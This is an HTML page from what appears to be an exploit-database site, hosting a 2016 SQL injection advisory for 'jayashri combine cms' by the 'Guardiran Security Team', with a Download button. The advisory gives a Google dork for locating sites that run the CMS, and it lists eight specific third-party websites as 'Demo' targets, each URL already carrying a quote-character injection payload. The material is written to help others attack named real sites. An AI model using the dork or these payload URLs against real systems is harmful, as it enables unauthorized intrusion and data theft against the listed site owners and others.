<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-32</title>
    </head>
    <body>
        <center>
                <a  href="https://mr-msa.xyz/guexdb/exploits/exploit-32" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>
            ###########################

# jayashri combine cms Sql Injection vulnerability

###########################

 * Title : jayashri combine cms Sql Injection vulnerability
* Exploit Author : Guardiran Security Team
* Google Dork: intext:\"Solution By : Jaya Shri Combine\" inurl:\"id=\"
* Date: 6/25/2016
* Vendor Homepage: http://www.jayashricombine.com/
* Version : All Version
* Tested On : windows 10,kali linux

HEllo Guys.
This Is a Sql Injection Vulnerability
You Can Inject The Sites Without Bypass

----------------------------------

SQL INJECTION :

This CMS And Also Have SQLI Vulnerability.
We Cnd Found The Vulnerability With Putting The \" or \' After Number ID

Demo :

http://www.warunamanamperi.com/awardsinfo.php?id=4%27
http://www.imexlanka.com/usedvehicleinfo.php?id=106%27#.V24pVfkrLcc
http://www.lankaprimelands.com/moreinfo.php?id=124%27
http://kumuduni-ayurveda.com/pages.php?id=8%27
http://nooraniyyah.org/staffinfo.php?id=16%27#.V24pYfkrLcc
http://www.matarabusiness.com/business_info.php?id=1661%27
http://www.dbl.lk/eventinfo.php?id=17%27
http://www.dbautomation.lk/productinfo.php?id=25%27




* Special Tnx : cod3!nj3ct!0n , REX , MR.IMAN , alizombie , dastmale-sorkh , 1TED , Mr.Root
* Discovered By : J.ALL_EdIT0r
* We Are Guardiran Security Team
        </pre>
    </body>
</html>